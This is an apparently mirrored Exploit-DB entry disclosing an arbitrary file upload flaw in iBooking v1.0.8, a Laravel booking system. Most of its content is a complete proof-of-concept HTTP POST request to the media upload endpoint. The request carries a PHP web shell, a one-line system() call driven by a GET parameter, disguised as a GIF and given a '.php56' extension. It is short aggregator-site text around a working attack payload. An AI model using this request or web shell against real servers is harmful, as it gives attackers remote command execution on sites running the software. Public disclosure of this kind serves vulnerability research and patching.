8
[webapps] iBooking v1.0.8 - Arbitrary File Upload
source link: https://www.exploit-db.com/exploits/51119
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
iBooking v1.0.8 - Arbitrary File Upload
# Exploit Title: iBooking v1.0.8 - Arbitrary File Upload
# Exploit Author: d1z1n370/oPty
# Date: 01/11/2022
# Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088
# Tested on: Linux
# Version: 1.0.8
# Exploit Description:
The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
# PoC request
POST https://localhost/dashboard/upload-new-media HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/dashboard/settings
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062
Content-Length: 449
Connection: close
Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
-----------------------------115904534120015298741783774062
Content-Disposition: form-data; name="_token"
kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW
-----------------------------115904534120015298741783774062
Content-Disposition: form-data; name="is_modal"
1
-----------------------------115904534120015298741783774062
Content-Disposition: form-data; name="file"; filename="upload.php56"
Content-Type: image/gif
GIF89a;
<?php system($_GET['a']); phpinfo(); ?>
-----------------------------115904534120015298741783774062--
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK